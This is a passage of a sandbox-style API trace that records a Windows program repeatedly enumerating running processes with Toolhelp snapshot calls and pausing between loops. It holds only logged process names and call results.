lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0208.125] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.125] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.125] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.126] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.129] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.146] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0208.146] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0208.150] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0208.151] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0208.151] Sleep (dwMilliseconds=0x64) [0208.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0208.298] Process32FirstW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.298] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.299] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.299] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.299] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.300] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.300] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.300] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.300] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.301] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0208.301] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.301] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.302] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.302] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.302] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.302] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.303] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.303] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.303] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0208.304] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.304] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.304] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.305] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.305] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.305] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0208.306] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0208.307] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0208.307] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0208.307] Sleep (dwMilliseconds=0x64) [0208.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xf0 [0208.563] Process32FirstW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.563] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.564] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.564] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.564] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.565] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.565] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.566] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.566] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.566] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0208.567] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.567] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.567] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.568] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.568] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.568] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.569] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.569] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.570] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0208.571] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.571] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.572] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.572] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.573] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.573] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0208.573] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0208.574] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0208.574] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0208.574] Sleep (dwMilliseconds=0x64) [0208.740] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xf4 [0208.742] Process32FirstW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.742] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.743] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.743] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.748] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.748] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.748] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.748] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.749] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.749] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0208.749] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.750] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.750] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.750] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.751] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.751] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.752] Process32NextW 